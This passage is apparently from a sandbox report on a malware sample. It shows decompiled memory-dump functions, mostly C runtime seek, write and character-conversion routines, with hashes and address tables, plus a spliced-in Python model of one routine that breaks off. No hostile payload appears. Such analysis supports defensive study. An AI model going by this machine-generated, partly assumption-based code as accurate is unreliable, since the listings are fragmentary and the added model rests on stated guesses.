E00405D00(void* __ebx, void* __edx, void* __ebp, signed int* _a4, signed int _a8, intOrPtr _a12) {
	void* __edi;
	void* __esi;
	signed int _t30;
	signed int _t31;
	signed int _t32;
	signed int _t33;
	signed int _t35;
	signed int _t39;
	void* _t42;
	intOrPtr _t43;
	void* _t45;
	signed int _t48;
	signed int* _t53;
	void* _t54;
	void* _t55;
	void* _t57;

	_t54 = __ebp;
	_t45 = __edx;
	_t42 = __ebx;
	_t53 = _a4;
	if(_t53 == 0) {
		L40:
		_t31 = _t30 | 0xffffffff;
		__eflags = _t31;
		return _t31;
	} else {
		_t43 = _a12;
		if(_t43 == 2) {
			goto L40;
		} else {
			_t30 = _t53[0xe];
			if(_t30 == 0xffffffff || _t30 == 0xfffffffd) {
                                                                                                                                                                                                                                    							goto L40;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_t48 = _a8;
                                                                                                                                                                                                                                    							if(_t53[0x17] != 0x77) {
                                                                                                                                                                                                                                    								__eflags = _t43 - 1;
                                                                                                                                                                                                                                    								if(_t43 == 1) {
                                                                                                                                                                                                                                    									_t48 = _t48 + _t53[0x1a];
                                                                                                                                                                                                                                    									__eflags = _t48;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								__eflags = _t48;
                                                                                                                                                                                                                                    								if(_t48 < 0) {
                                                                                                                                                                                                                                    									goto L39;
                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                    									__eflags = _t53[0x16];
                                                                                                                                                                                                                                    									if(__eflags == 0) {
                                                                                                                                                                                                                                    										_t33 = _t53[0x1a];
                                                                                                                                                                                                                                    										__eflags = _t48 - _t33;
                                                                                                                                                                                                                                    										if(_t48 < _t33) {
                                                                                                                                                                                                                                    											_t30 = E004054F0(_t42, _t54, _t53);
                                                                                                                                                                                                                                    											_t55 = _t55 + 4;
                                                                                                                                                                                                                                    											__eflags = _t30;
                                                                                                                                                                                                                                    											if(_t30 < 0) {
                                                                                                                                                                                                                                    												goto L39;
                                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                                    												goto L27;
                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                    											_t48 = _t48 - _t33;
                                                                                                                                                                                                                                    											L27:
                                                                                                                                                                                                                                    											__eflags = _t48;
                                                                                                                                                                                                                                    											if(_t48 == 0) {
                                                                                                                                                                                                                                    												L38:
                                                                                                                                                                                                                                    												return _t53[0x1a];
                                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                                    												__eflags = _t53[0x12];
                                                                                                                                                                                                                                    												if(_t53[0x12] != 0) {
                                                                                                                                                                                                                                    													L30:
                                                                                                                                                                                                                                    													__eflags = _t53[0x1b] - 0xffffffff;
                                                                                                                                                                                                                                    													if(_t53[0x1b] != 0xffffffff) {
                                                                                                                                                                                                                                    														_t53[0x1a] = _t53[0x1a] + 1;
                                                                                                                                                                                                                                    														_t48 = _t48 - 1;
                                                                                                                                                                                                                                    														__eflags = _t53[0x1c];
                                                                                                                                                                                                                                    														_t53[0x1b] = 0xffffffff;
                                                                                                                                                                                                                                    														if(_t53[0x1c] != 0) {
                                                                                                                                                                                                                                    															_t53[0xe] = 1;
                                                                                                                                                                                                                                    														}
                                                                                                                                                                                                                                    													}
                                                                                                                                                                                                                                    													__eflags = _t48;
                                                                                                                                                                                                                                    													if(_t48 <= 0) {
                                                                                                                                                                                                                                    														goto L38;
                                                                                                                                                                                                                                    													} else {
                                                                                                                                                                                                                                    														while(1) {
                                                                                                                                                                                                                                    															_t35 = 0x4000;
                                                                                                                                                                                                                                    															__eflags = _t48 - 0x4000;
                                                                                                                                                                                                                                    															if(_t48 < 0x4000) {
                                                                                                                                                                                                                                    																_t35 = _t48;
                                                                                                                                                                                                                                    															}
                                                                                                                                                                                                                                    															_t30 = E00405A20(_t45, _t53, _t53[0x12], _t35);
                                                                                                                                                                                                                                    															_t55 = _t55 + 0xc;
                                                                                                                                                                                                                                    															__eflags = _t30;
                                                                                                                                                                                                                                    															if(_t30 <= 0) {
                                                                                                                                                                                                                                    																goto L39;
                                                                                                                                                                                                                                    															}
                                                                                                                                                                                                                                    															_t48 = _t48 - _t30;
                                                                                                                                                                                                                                    															__eflags = _t48;
                                                                                                                                                                                                                                    															if(_t48 > 0) {
                                                                                                                                                                                                                                    																continue;
                                                                                                                                                                                                                                    															} else {
                                                                                                                                                                                                                                    																goto L38;
                                                                                                                                                                                                                                    															}
                                                                                                                                                                                                                                    															goto L41;
                                                                                                                                                                                                                                    														}
                                                                                                                                                                                                                                    														goto L39;
                                                                                                                                                                                                                                    													}
                                                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                                                    													_t30 = E0040B84D(_t42, _t45, _t48, 0x4000);
                                                                                                                                                                                                                                    													_t55 = _t55 + 4;
                                                                                                                                                                                                                                    													_t53[0x12] = _t30;
                                                                                                                                                                                                                                    													__eflags = _t30;
                                                                                                                                                                                                                                    													if(_t30 == 0) {
                                                                                                                                                                                                                                    														goto L39;
                                                                                                                                                                                                                                    													} else {
                                                                                                                                                                                                                                    														goto L30;
                                                                                                                                                                                                                                    													}
                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                    										_push(0);
                                                                                                                                                                                                                                    										_push(_t48);
                                                                                                                                                                                                                                    										_push(_t53[0x10]);
                                                                                                                                                                                                                                    										_t53[0x1b] = 0xffffffff;
                                                                                                                                                                                                                                    										_t53[1] = 0;
                                                                                                                                                                                                                                    										 *_t53 = _t53[0x11];
                                                                                                                                                                                                                                    										_t30 = E0040C46B(_t42, _t53[0x10], _t48, _t53, __eflags);
                                                                                                                                                                                                                                    										__eflags = _t30;
                                                                                                                                                                                                                                    										if(_t30 < 0) {
                                                                                                                                                                                                                                    											goto L39;
                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                    											_t53[0x1a] = _t48;
                                                                                                                                                                                                                                    											_t53[0x19] = _t48;
                                                                                                                                                                                                                                    											return _t48;
                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								if(_t43 == 0) {
                                                                                                                                                                                                                                    									_t48 = _t48 - _t53[0x19];
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								if(_t48 < 0) {
                                                                                                                                                                                                                                    									L39:
						_t32 = _t30 | 0xffffffff;
						__eflags = _t32;
						return _t32;
					} else {
						if(_t53[0x11] != 0) {
							L11:
							if(_t48 <= 0) {
								L17:
								return _t53[0x19];
							} else {
								while(1) {
									_t39 = 0x4000;
									if(_t48 < 0x4000) {
										_t39 = _t48;
									}
									_t30 = E00405260(_t42, _t45, _t53, _t53[0x11], _t39);
									_t55 = _t55 + 0xc;
									if(_t30 == 0) {
										goto L39;
									}
									_t48 = _t48 - _t30;
									if(_t48 > 0) {
										continue;
									} else {
										goto L17;
									}
									goto L41;
								}
								goto L39;
							}
						} else {
							_t30 = E0040B84D(_t42, _t45, _t48, 0x4000);
							_t57 = _t55 + 4;
							_t53[0x11] = _t30;
							if(_t30 == 0) {
								goto L39;
							} else {
								E0040BA30(_t48, _t30, 0, 0x4000);
								_t55 = _t57 + 0xc;
								goto L11;
							}
						}
					}
				}
			}
		}
	}
	L41:
}
                                                                                                                                                                                                                                    0x00405e2c
                                                                                                                                                                                                                                    0x00405e18
                                                                                                                                                                                                                                    0x00405e12
                                                                                                                                                                                                                                    0x00405dc3
                                                                                                                                                                                                                                    0x00405dc9
                                                                                                                                                                                                                                    0x00405dcb
                                                                                                                                                                                                                                    0x00405dcc
                                                                                                                                                                                                                                    0x00405dcd
                                                                                                                                                                                                                                    0x00405dd4
                                                                                                                                                                                                                                    0x00405ddb
                                                                                                                                                                                                                                    0x00405ddd
                                                                                                                                                                                                                                    0x00405de5
                                                                                                                                                                                                                                    0x00405de7
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405ded
                                                                                                                                                                                                                                    0x00405ded
                                                                                                                                                                                                                                    0x00405df0
                                                                                                                                                                                                                                    0x00405df7
                                                                                                                                                                                                                                    0x00405df7
                                                                                                                                                                                                                                    0x00405de7
                                                                                                                                                                                                                                    0x00405dc1
                                                                                                                                                                                                                                    0x00405d3a
                                                                                                                                                                                                                                    0x00405d3c
                                                                                                                                                                                                                                    0x00405d3e
                                                                                                                                                                                                                                    0x00405d3e
                                                                                                                                                                                                                                    0x00405d43
                                                                                                                                                                                                                                    0x00405e79
                                                                                                                                                                                                                                    0x00405e7a
                                                                                                                                                                                                                                    0x00405e7a
                                                                                                                                                                                                                                    0x00405e7e
                                                                                                                                                                                                                                    0x00405d49
                                                                                                                                                                                                                                    0x00405d4d
                                                                                                                                                                                                                                    0x00405d77
                                                                                                                                                                                                                                    0x00405d79
                                                                                                                                                                                                                                    0x00405da7
                                                                                                                                                                                                                                    0x00405dac
                                                                                                                                                                                                                                    0x00405d7b
                                                                                                                                                                                                                                    0x00405d80
                                                                                                                                                                                                                                    0x00405d80
                                                                                                                                                                                                                                    0x00405d87
                                                                                                                                                                                                                                    0x00405d89
                                                                                                                                                                                                                                    0x00405d89
                                                                                                                                                                                                                                    0x00405d91
                                                                                                                                                                                                                                    0x00405d96
                                                                                                                                                                                                                                    0x00405d9b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405da1
                                                                                                                                                                                                                                    0x00405da5
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405da5
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405d80
                                                                                                                                                                                                                                    0x00405d4f
                                                                                                                                                                                                                                    0x00405d54
                                                                                                                                                                                                                                    0x00405d59
                                                                                                                                                                                                                                    0x00405d5c
                                                                                                                                                                                                                                    0x00405d61
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405d67
                                                                                                                                                                                                                                    0x00405d6f
                                                                                                                                                                                                                                    0x00405d74
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405d74
                                                                                                                                                                                                                                    0x00405d61
                                                                                                                                                                                                                                    0x00405d4d
                                                                                                                                                                                                                                    0x00405d43
                                                                                                                                                                                                                                    0x00405d38
                                                                                                                                                                                                                                    0x00405d20
                                                                                                                                                                                                                                    0x00405d14
                                                                                                                                                                                                                                    0x00000000

APIs
Memory Dump Source
• Source File: 0000000D.00000002.326634560.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.326634560.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.326634560.000000000042F000.00000040.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_con1332.jbxd
Yara matches
Similarity
• API ID: _fseek_malloc_memset
• String ID:
• API String ID: 208892515-0
• Opcode ID: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
• Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
• Opcode Fuzzy Hash: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
• Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 91%
E0040BAAA(signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
	signed int _v8;
	signed int _v12;
	signed int _v16;
	void* __ebx;
	void* __edi;
	void* __esi;
	void* __ebp;
	signed int _t59;
	intOrPtr* _t61;
	signed int _t63;
	void* _t68;
	signed int _t69;
	signed int _t72;
	signed int _t74;
	signed int _t75;
	signed int _t77;
	signed int _t78;
	signed int _t81;
	signed int _t82;
	signed int _t84;
	signed int _t88;
	signed int _t90;   /* temporaries used below but left undeclared by the decompiler */
	signed int _t97;
	signed int _t98;
	signed int _t99;
	intOrPtr* _t100;
	void* _t101;
	intOrPtr* _t105;

	_t90 = __edx;
	/* bail out with 0 when either size argument is zero */
	if(_a8 == 0 || _a12 == 0) {
		L4:
		return 0;
	} else {
		_t100 = _a16;
		_t105 = _t100;
		if(_t100 != 0) {
                                                                                                                                                                                                                                    						_t82 = _a4;
                                                                                                                                                                                                                                    						__eflags = _t82;
                                                                                                                                                                                                                                    						if(__eflags == 0) {
                                                                                                                                                                                                                                    							goto L3;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t63 = _t59 | 0xffffffff;
                                                                                                                                                                                                                                    						_t90 = _t63 % _a8;
                                                                                                                                                                                                                                    						__eflags = _a12 - _t63 / _a8;
                                                                                                                                                                                                                                    						if(__eflags > 0) {
                                                                                                                                                                                                                                    							goto L3;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t97 = _a8 * _a12;
                                                                                                                                                                                                                                    						__eflags =  *(_t100 + 0xc) & 0x0000010c;
                                                                                                                                                                                                                                    						_v8 = _t82;
                                                                                                                                                                                                                                    						_v16 = _t97;
                                                                                                                                                                                                                                    						_t81 = _t97;
                                                                                                                                                                                                                                    						if(( *(_t100 + 0xc) & 0x0000010c) == 0) {
                                                                                                                                                                                                                                    							_v12 = 0x1000;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_v12 =  *(_t100 + 0x18);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						__eflags = _t97;
                                                                                                                                                                                                                                    						if(_t97 == 0) {
                                                                                                                                                                                                                                    							L32:
                                                                                                                                                                                                                                    							return _a12;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							do {
                                                                                                                                                                                                                                    								_t84 =  *(_t100 + 0xc) & 0x00000108;
                                                                                                                                                                                                                                    								__eflags = _t84;
                                                                                                                                                                                                                                    								if(_t84 == 0) {
                                                                                                                                                                                                                                    									L18:
                                                                                                                                                                                                                                    									__eflags = _t81 - _v12;
                                                                                                                                                                                                                                    									if(_t81 < _v12) {
                                                                                                                                                                                                                                    										_t68 = E0040F0AD(_t90, _t97,  *_v8, _t100);
                                                                                                                                                                                                                                    										__eflags = _t68 - 0xffffffff;
                                                                                                                                                                                                                                    										if(_t68 == 0xffffffff) {
                                                                                                                                                                                                                                    											L34:
                                                                                                                                                                                                                                    											_t69 = _t97;
                                                                                                                                                                                                                                    											L35:
                                                                                                                                                                                                                                    											return (_t69 - _t81) / _a8;
                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                    										_v8 = _v8 + 1;
                                                                                                                                                                                                                                    										_t72 =  *(_t100 + 0x18);
                                                                                                                                                                                                                                    										_t81 = _t81 - 1;
                                                                                                                                                                                                                                    										_v12 = _t72;
                                                                                                                                                                                                                                    										__eflags = _t72;
                                                                                                                                                                                                                                    										if(_t72 <= 0) {
                                                                                                                                                                                                                                    											_v12 = 1;
                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                    										goto L31;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    									__eflags = _t84;
                                                                                                                                                                                                                                    									if(_t84 == 0) {
                                                                                                                                                                                                                                    										L21:
                                                                                                                                                                                                                                    										__eflags = _v12;
                                                                                                                                                                                                                                    										_t98 = _t81;
                                                                                                                                                                                                                                    										if(_v12 != 0) {
                                                                                                                                                                                                                                    											_t75 = _t81;
                                                                                                                                                                                                                                    											_t90 = _t75 % _v12;
                                                                                                                                                                                                                                    											_t98 = _t98 - _t75 % _v12;
                                                                                                                                                                                                                                    											__eflags = _t98;
                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                    										_push(_t98);
                                                                                                                                                                                                                                    										_push(_v8);
                                                                                                                                                                                                                                    										_push(E0040FA20(_t90, _t98, _t100));
                                                                                                                                                                                                                                    										_t74 = E0040F944(_t81, _t90, _t98, _t100, __eflags);
                                                                                                                                                                                                                                    										_t101 = _t101 + 0xc;
                                                                                                                                                                                                                                    										__eflags = _t74 - 0xffffffff;
                                                                                                                                                                                                                                    										if(_t74 == 0xffffffff) {
                                                                                                                                                                                                                                    											L36:
                                                                                                                                                                                                                                    											 *(_t100 + 0xc) =  *(_t100 + 0xc) | 0x00000020;
                                                                                                                                                                                                                                    											_t69 = _v16;
                                                                                                                                                                                                                                    											goto L35;
                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                    											_t88 = _t98;
                                                                                                                                                                                                                                    											__eflags = _t74 - _t98;
                                                                                                                                                                                                                                    											if(_t74 <= _t98) {
                                                                                                                                                                                                                                    												_t88 = _t74;
                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                    											_v8 = _v8 + _t88;
                                                                                                                                                                                                                                    											_t81 = _t81 - _t88;
                                                                                                                                                                                                                                    											__eflags = _t74 - _t98;
                                                                                                                                                                                                                                    											if(_t74 < _t98) {
                                                                                                                                                                                                                                    												goto L36;
                                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                                    												L27:
                                                                                                                                                                                                                                    												_t97 = _v16;
                                                                                                                                                                                                                                    												goto L31;
                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    									_t77 = E0040C1FB(_t100);
                                                                                                                                                                                                                                    									__eflags = _t77;
                                                                                                                                                                                                                                    									if(_t77 != 0) {
                                                                                                                                                                                                                                    										goto L34;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    									goto L21;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								_t78 =  *(_t100 + 4);
                                                                                                                                                                                                                                    								__eflags = _t78;
                                                                                                                                                                                                                                    								if(__eflags == 0) {
                                                                                                                                                                                                                                    									goto L18;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								if(__eflags < 0) {
                                                                                                                                                                                                                                    									_t48 = _t100 + 0xc;
                                                                                                                                                                                                                                    									 *_t48 =  *(_t100 + 0xc) | 0x00000020;
                                                                                                                                                                                                                                    									__eflags =  *_t48;
                                                                                                                                                                                                                                    									goto L34;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								_t99 = _t81;
                                                                                                                                                                                                                                    								__eflags = _t81 - _t78;
                                                                                                                                                                                                                                    								if(_t81 >= _t78) {
                                                                                                                                                                                                                                    									_t99 = _t78;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								E0040B350(_t81, _t99, _t100,  *_t100, _v8, _t99);
                                                                                                                                                                                                                                    								 *(_t100 + 4) =  *(_t100 + 4) - _t99;
                                                                                                                                                                                                                                    								 *_t100 =  *_t100 + _t99;
                                                                                                                                                                                                                                    								_t101 = _t101 + 0xc;
                                                                                                                                                                                                                                    								_t81 = _t81 - _t99;
                                                                                                                                                                                                                                    								_v8 = _v8 + _t99;
                                                                                                                                                                                                                                    								goto L27;
                                                                                                                                                                                                                                    								L31:
                                                                                                                                                                                                                                    								__eflags = _t81;
                                                                                                                                                                                                                                    							} while (_t81 != 0);
                                                                                                                                                                                                                                    							goto L32;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					L3:
                                                                                                                                                                                                                                    					_t61 = E0040BFC1(_t105);
                                                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                                                    					 *_t61 = 0x16;
                                                                                                                                                                                                                                    					E0040E744(_t90, 0, _t100);
                                                                                                                                                                                                                                    					goto L4;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    			}
                                                                                                                                                                                                                                    0x0040bb50
                                                                                                                                                                                                                                    0x0040bb55
                                                                                                                                                                                                                                    0x0040bb58
                                                                                                                                                                                                                                    0x0040bb5a
                                                                                                                                                                                                                                    0x0040bb5d
                                                                                                                                                                                                                                    0x0040bb5f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040bbe1
                                                                                                                                                                                                                                    0x0040bbe1
                                                                                                                                                                                                                                    0x0040bbe1
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040bb2a
                                                                                                                                                                                                                                    0x0040bb24
                                                                                                                                                                                                                                    0x0040bac8
                                                                                                                                                                                                                                    0x0040bac8
                                                                                                                                                                                                                                    0x0040bacd
                                                                                                                                                                                                                                    0x0040bace
                                                                                                                                                                                                                                    0x0040bacf
                                                                                                                                                                                                                                    0x0040bad0
                                                                                                                                                                                                                                    0x0040bad1
                                                                                                                                                                                                                                    0x0040bad2
                                                                                                                                                                                                                                    0x0040bad8
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040badd

APIs
• __flush.LIBCMT ref: 0040BB6E
• __fileno.LIBCMT ref: 0040BB8E
• __locking.LIBCMT ref: 0040BB95
• __flsbuf.LIBCMT ref: 0040BBC0
  • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
  • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
Memory Dump Source
• Source File: 0000000D.00000002.326634560.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.326634560.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.326634560.000000000042F000.00000040.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_con1332.jbxd
Yara matches
Similarity
• API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
• String ID:
• API String ID: 3240763771-0
• Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
• Instruction ID: 72eaa501f89e5d914343e0f007c81726c853b1270fdaa85e4c7363b387074608
• Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
• Instruction Fuzzy Hash: B441A331A006059BDF249F6A88855AFB7B5EF80320F24853EE465B76C4D778EE41CB8C
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000D.00000002.327606223.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2bf0000_con1332.jbxd
Yara matches
Similarity
• API ID: _fseek_malloc_memset
• String ID:
• API String ID: 208892515-0
• Opcode ID: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
• Instruction ID: 56c7d3bdd436992d3d28e01f508f1e1f9e4f09eb4417eaf06df5dfd70bf7cb3f
• Opcode Fuzzy Hash: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
• Instruction Fuzzy Hash: 11419372604B114AD6B0863D998471673EADF90358F250A99EFB682F90E731E449CB51
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000D.00000002.327606223.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2bf0000_con1332.jbxd
Yara matches
Similarity
• API ID: __fileno__flsbuf__flush__getptd_noexit__locking
• String ID:
• API String ID: 1291973410-0
• Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
• Instruction ID: 42f9615f664fbd0a58d81adf719723810992d2a7a93973b0e1fcaf0098cf3d2b
• Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
• Instruction Fuzzy Hash: E2412A36A00608EFDB94DF69C8805AEF7B6EF8832CF2485A9D75597140E730D948CB41
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E0041529F(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				int _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t72;

				_t72 = _a8;
				if(_t72 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t72 != 0) {
						E0040EC86( &_v20, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E004153D0( *_t72 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
                                                                                                                                                                                                                                    								L21:
                                                                                                                                                                                                                                    								_t54 = E0040BFC1(__eflags);
                                                                                                                                                                                                                                    								 *_t54 = 0x2a;
                                                                                                                                                                                                                                    								__eflags = _v8;
                                                                                                                                                                                                                                    								if(_v8 != 0) {
                                                                                                                                                                                                                                    									_t54 = _v12;
                                                                                                                                                                                                                                    									_t33 = _t54 + 0x70;
                                                                                                                                                                                                                                    									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
                                                                                                                                                                                                                                    									__eflags =  *_t33;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								return _t54 | 0xffffffff;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							_t56 = _v20;
                                                                                                                                                                                                                                    							_t65 =  *(_t56 + 0xac);
                                                                                                                                                                                                                                    							__eflags = _t65 - 1;
                                                                                                                                                                                                                                    							if(_t65 <= 1) {
                                                                                                                                                                                                                                    								L17:
                                                                                                                                                                                                                                    								__eflags = _a12 -  *(_t56 + 0xac);
                                                                                                                                                                                                                                    								if(__eflags < 0) {
                                                                                                                                                                                                                                    									goto L21;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								__eflags = _t72[1];
                                                                                                                                                                                                                                    								if(__eflags == 0) {
                                                                                                                                                                                                                                    									goto L21;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								L19:
                                                                                                                                                                                                                                    								_t57 =  *(_t56 + 0xac);
                                                                                                                                                                                                                                    								__eflags = _v8;
                                                                                                                                                                                                                                    								if(_v8 == 0) {
                                                                                                                                                                                                                                    									return _t57;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
                                                                                                                                                                                                                                    								return _t57;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							__eflags = _a12 - _t65;
                                                                                                                                                                                                                                    							if(_a12 < _t65) {
                                                                                                                                                                                                                                    								goto L17;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							__eflags = _a4;
                                                                                                                                                                                                                                    							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
                                                                                                                                                                                                                                    							__eflags = _t58;
                                                                                                                                                                                                                                    							_t56 = _v20;
                                                                                                                                                                                                                                    							if(_t58 != 0) {
                                                                                                                                                                                                                                    								goto L19;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							goto L17;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t59 = _a4;
                                                                                                                                                                                                                                    						__eflags = _t59;
                                                                                                                                                                                                                                    						if(_t59 != 0) {
                                                                                                                                                                                                                                    							 *_t59 =  *_t72 & 0x000000ff;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						goto L10;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t60 = _a4;
                                                                                                                                                                                                                                    						if(_t60 != 0) {
                                                                                                                                                                                                                                    							 *_t60 = 0;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						goto L5;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    			}
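The listing above is easier to reason about as an outcome table than as control flow, so here is an added Python model of it. This is example code written for this page, not code from the report, the sandbox, or the sample. It assumes a cp932 (Shift-JIS) locale with MB_CUR_MAX = 2 and uses Python's strict cp932 decoder in place of MultiByteToWideChar with MB_ERR_INVALID_CHARS; the lead-byte ranges, the function and parameter names, and the behaviour of the cut-off prologue (NULL or empty input returns 0) are assumptions, not facts taken from the report. The point it makes visible is the L17/L19 path: a lead byte followed by an invalid but non-NUL trail byte is reported as a 2-byte character without any output character being written.

```python
from typing import Optional, Tuple

EILSEQ = 42  # the value the fragment stores through the errno pointer (0x2a)


def is_lead_byte_cp932(b: int) -> bool:
    """Assumed lead-byte ranges for cp932; the real routine asks the locale (E004153D0 in the listing)."""
    return 0x81 <= b <= 0x9F or 0xE0 <= b <= 0xFC


def mbtowc_model(s: Optional[bytes], n: int, mb_cur_max: int = 2,
                 codepage: str = "cp932", c_locale: bool = False) -> Tuple[int, Optional[str], int]:
    """Return (result, wide_char, errno) the way the decompiled routine would.

    result is the number of bytes consumed, 0 for a NUL byte, or -1 with errno = EILSEQ.
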